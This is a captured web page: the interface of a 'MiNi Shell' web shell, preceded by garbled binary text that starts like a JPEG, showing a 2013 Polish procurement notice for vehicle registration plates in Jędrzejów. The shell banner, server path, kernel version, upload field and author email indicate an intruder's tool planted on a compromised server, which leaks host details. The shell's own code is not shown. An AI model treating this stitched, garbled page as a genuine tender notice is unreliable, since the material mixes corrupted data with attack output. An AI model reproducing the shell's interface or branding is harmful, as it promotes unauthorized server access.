JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131105/449534-N-2013.html

<p class="kh_header"><b>Jędrzejów: Sukcesywne wykonanie i dostawa tablic rejestracyjnych do oznaczania różnego typu pojazdów dla Wydziału Komunikacji, Transportu i Dróg Publicznych Starostwa Powiatowego w Jędrzejowie</b><br>
<b>Numer ogłoszenia: 449534 - 2013; data zamieszczenia: 05.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Jędrzejowski , 11 Listopada 83, 28-300 Jędrzejów, woj. świętokrzyskie, tel. 041 3863741, faks 041 3863741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatjedrzejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne wykonanie i dostawa tablic rejestracyjnych do oznaczania różnego typu pojazdów dla Wydziału Komunikacji, Transportu i Dróg Publicznych Starostwa Powiatowego w Jędrzejowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest sukcesywne wykonanie i dostawa tablic rejestracyjnych do oznaczenia różnego typu pojazdów dla Wydziału Komunikacji, Transportu i Dróg Publicznych Starostwa Powiatowego w Jędrzejowie. 
3.2.	Tablice rejestracyjne muszą być wykonane zgodnie z obowiązującymi na dzień wykonania przepisami prawa oraz zgodnie z wymogami określonymi w ustawie z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tekst jednolity Dz. U. z 2012 r., poz. 1137 z późn. zm.) i Rozporządzeniu Ministra Infrastruktury z dnia 22 lipca 2002 r. w sprawie rejestracji i oznaczania pojazdów ( Dz. U. Nr 186, poz. 1322 z późn. zm. ) oraz Rozporządzeniu Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie warunków produkcji i sposobu dystrybucji tablic rejestracyjnych i znaków legalizacyjnych z dnia 2 maja 2012 r. (Dz. U. z 2012 r. poz. 585).
3.3.W przypadku zmiany przepisów, o których mowa powyżej w okresie wykonywania przedmiotu zamówienia, Wykonawca jest zobowiązany do wykonania i dostawy tablic rejestracyjnych po uwzględnieniu tych zmian.
3.4.  Przedmiot zamówienia obejmuje swoim zakresem, sukcesywne wykonanie i dostawę tablic rejestracyjnych w ilościach około:
- tablice samochodowe jednorzędowe i dwurzędowe  - 17 000 kompletów
- tablice do przyczep jednorzędowe i dwurzędowe      - 2 000 sztuk
- tablice motocyklowe                                                   -  3 000 sztuk
- tablice motorowerowe                                                 -  2 000 sztuk
oraz protokolarny odbiór, w  ciągu 7 dni od daty powiadomienia i fizyczne zniszczenie tablic rejestracyjnych wycofanych z użytku i przeznaczonych do złomowania w sposób zgodny z obowiązującymi przepisami prawa.
3.5 Z w/w ilości tablic zamawiane będą również tablice zabytkowe, indywidualne, tymczasowe  oraz wtórniki tablic.
3.6. Wykazane ilości tablic rejestracyjnych mają charakter szacunkowy i Zamawiający nie gwarantuje ich całkowitej realizacji. 
3.7.	Tablice będą dostarczane Zamawiającemu na podstawie ilości określonych w zamówieniu przesłanym Wykonawcy telefonicznie lub faksem lub w formie elektronicznej.
3.8.	Tablice rejestracyjne dostarczane będą w terminie do 7 dni roboczych od złożenia przez Zamawiającego zamówienia. W przypadku zamawiania wtórników tablic czas realizacji zamówienia - do 24 godzin od złożenia zamówienia. 
Dostawy partii będą realizowane w dni robocze w godzinach pracy Wydziału Komunikacji, Transportu i Dróg Publicznych w Jędrzejowie. W przypadku,  gdy upływ terminu dostawy partii nastąpi w dniu wolnym od pracy, termin dostawy upływa w pierwszym dniu roboczym następującym po tym dniu.
3.9.	Zamawiający zastrzega sobie możliwość zamiany wskazanych powyżej ilości w ramach poszczególnych rodzajów tablic rejestracyjnych.
Wskazane ilości sztuk tablic rejestracyjnych stanowią planowaną maksymalną wielkość zamówienia i mogą ulec zmniejszeniu stosownie do potrzeb Zamawiającego w okresie trwania umowy. Ostateczna wielkość może ulec zmianie w zależności od bieżących potrzeb Zamawiającego i Zamawiający nie gwarantuje całkowitej realizacji zamówienia.
Zamawiający zastrzega sobie prawo do zmniejszenia zakresu ilościowego poszczególnych tablic i zwiększenia w zamian zakresu ilościowego innych tablic rejestracyjnych z asortymentu objętego zamówieniem.
3.10.	Wykonawca będzie dostarczał tablice własnym środkiem transportu do siedziby Wydziału Komunikacji, Transportu i Dróg Publicznych Starostwa Powiatowego w Jędrzejowie.
3.11.	Dostarczane tablice winny być opakowane w folię w paczkach po 25 kompletów (50 sztuk) z czytelnym opisem numeru serii i numerami kolejnymi.
3.12.	Koszty związane z dostawą nowych  tablic rejestracyjnych wraz z rozładunkiem oraz odbiorem wycofanych z użytku ponosi Wykonawca.
3.13. Na dostarczone tablice zostanie udzielona gwarancja na okres 3 lat od daty odbioru dostawy. W przypadku stwierdzenia wad lub braków, wykonawca jest zobowiązany wymienić wadliwy wyrób i na swój koszt dostarczyć go do Zamawiającego w ciągu 24 godzin od daty zgłoszenia.
3.14.Zamawiający wymaga, aby zamówienie było wykonywane sukcesywnie w miarę potrzeb zgłaszanych przez Zamawiającego w okresie od 01.01.2014r. do - 31.12.2016r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.50.00-2, 44.42.34.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 13.1.	Oferta winna być zabezpieczona wadium na kwotę 5 000,00 zł. (słownie: pięć tysięcy zł.). Wadium wnosi się przed upływem terminu składania ofert. 
13.2 Wykonawca może wnieść wadium w jednej lub kilku następujących formach:
	 1) pieniądzu 
Wadium wniesione w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Jędrzejowie Nr 48 8490 0007 2001 0000 6611 0014, a za termin wniesienia przyjmuje się rzeczywisty czas uznania  rachunku bankowego Zamawiającego. Wykonawca jest zobowiązany do dołączenia do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać Wadium- Tablice rejestracyjne.
	2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3)	gwarancjach bankowych;
	4)	gwarancjach ubezpieczeniowych;
	5)	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
	W przypadku wniesienia wadium w innej formie niż w pieniądzu, Wykonawca zobowiązany jest do dołączenia do oferty oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty o których mowa w punkcie 13.2 ppkt. 2) - 5) muszą zachować ważność przez cały okres związania ofertą, oraz zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy do zapłaty Zamawiającemu kwoty wadium w przypadkach wystąpienia jednej z okoliczności wynikających z art. 46 ust. 4a i ust. 5 ustawy Pzp.
13.3. Wykonawca którego oferta, nie będzie zabezpieczona wadium zostanie przez Zamawiającego wykluczony z postępowania, a jego oferta zostanie odrzucona.
13.4. Zamawiający dokona zwrotu wadium zgodnie z art. 46 Ustawy Pzp.
13.5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
- zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie o którym mowa w ustawie Prawo zamówień publicznych w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualne zaświadczenie o wpisie do rejestru przedsiębiorców produkujących tablice rejestracyjne o którym mowa w ustawie z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (tj. Dz. U. z 2012r. poz. 1137 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnieniem tego warunku będzie wykazanie przez Wykonawcę należytego wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie, co najmniej dwóch dostaw tablic rejestracyjnych, każda z dostaw o wartości co najmniej 100 000 zł. wraz z odbiorem i złomowaniem tablic używanych oraz załączenie dowodów, czy zostały wykonane lub są wykonywane należycie;
Wykaz winien zawierać wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wszystkie dostawy tablic rejestracyjnych, każda z dostaw o wartości nie niższej niż 100 000 zł. wraz z odbiorem i złomowaniem tablic używanych z podaniem ich wartości, rodzaju, daty i miejsca wykonania.
Wykonawca winien wskazać w wykazie informacje, które z dostaw nie zostały wykonane lub zostały wykonane nienależycie w celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawcy.
Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczeń i dokumentów wymienionych w punkcie IX pkt 9.2 c) niniejszej SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, a tym samym nie dokonuje jego opisu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, a tym samym nie dokonuje jego opisu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, a tym samym nie dokonuje jego opisu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód wniesienia wadium - zgodnie z opisem w punkcie XIII niniejszej SIWZ.
Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę. 
2. Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik.
( Pełnomocnictwo winno zawierać w szczególności wskazanie:
-    postępowania o zamówienie publiczne;
-    Wykonawcę ubiegającego się o udzielenie zamówienia,
-   określenie  ustanowionego Pełnomocnika oraz zakres jego umocowania.)
          Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.
3. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
( Pełnomocnictwo winno zawierać w szczególności wskazanie:
-   postępowania o zamówienie publiczne;
- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy wraz z określeniem adresu siedziby;
-   określenie ustanowionego Pełnomocnika oraz zakres jego umocowania.)
          Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.
(Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenia zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców )
      Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza. 
4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
5. Zgodnie z art. 141 Pzp Wykonawcy składający ofertę wspólną ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. Zasady odpowiedzialności solidarnej dłużników określa art. 366 Kodeksu cywilnego. 
6. W przypadku składania oferty przez Wykonawców występujących wspólnie, zgodnie z art. 23 Pzp, wykonawcy ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
7. Wykonawcy występujący wspólnie (konsorcjum, spółka cywilna) muszą łącznie spełniać warunki, o których mowa w  art. 22 ust. 1 Pzp z tym, że
8. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust.1 Pzp
Dokumenty wymienione w pkt 8.2.1, pkt 9.2.b) - zezwolenie i 9.7.3 - certyfikaty musi posiadać Wykonawca, który będzie odpowiadać za produkcję tablic rejestracyjnych.
9. Każdy Wykonawca występujący wspólnie (w ramach konsorcjum, wspólnicy spółki cywilnej) musi złożyć oddzielnie dokumenty wskazane w punkcie 9.3 a), pkt 9.3 b), pkt 9.3 c) i pkt 9.3 d), pkt. 9.7.1 lub 9.7.2 SIWZ. 
10.  Wykonawcy występujący wspólnie (w ramach konsorcjum, wspólnicy spółki cywilnej) składają łącznie dokumenty wskazane w punkcie 9.1, pkt 9.2 a), pkt 9.2. b), pkt 9.2 c), pkt 9.4 oraz pkt 9.6 (o ile dotyczy) SIWZ.
11.  Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
12. Dodatkowo Wykonawcy w ramach składanej oferty składają :
- aktualne certyfikaty wydane przez Instytut Transportu Samochodowego na wszystkie rodzaje tablic z wyjątkiem tablic dyplomatycznych umożliwiające natychmiastową realizację zamówienia.
Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę. 
Zamawiający w trybie art. 26 ust. 3 wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub pełnomocnictw lub którzy złożyli dokumenty zawierające błędy lub wadliwe pełnomocnictwa do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
Zamawiający wezwie także w wyznaczonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń i dokumentów o których mowa w art. 25 ust. 1 ustawy Pzp.
Zamawiający nie dopuszcza powierzenia przez Wykonawcę podwykonawcom produkcji tablic rejestracyjnych.
13. Zamawiający żąda wskazania przez Wykonawcę części zamówienia, którą wykonanie zamierza powierzyć podwykonawcom. Wskazanie winno nastąpić poprzez określenie jej rodzaju i zakresu. W przypadku braku takiego wskazania Zamawiający uzna, że Wykonawca zrealizuje przedmiotowe zamówienie sam.
14. Wykonawca przed podpisaniem umowy zobowiązany będzie przedłożyć Zamawiającemu projekt umowy z podwykonawcą ze wskazaniem tej części zamówienia, którą zamierza powierzyć mu do wykonania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany treści umowy polegające na zwiększeniu lub zmniejszeniu wartości brutto umowy w przypadku zwiększenia bądź zmniejszenia stawki podatku VAT, przy jednoczesnym zachowaniu niezmienionej ceny netto określonej w § 3 umowy oraz w formularzu ofertowym</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatjedrzejow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Jędrzejowie
ul. 11 Listopada 83, 28-300 Jędrzejów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Jędrzejowie
ul. 11 Listopada 83, 28-300 Jędrzejów pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com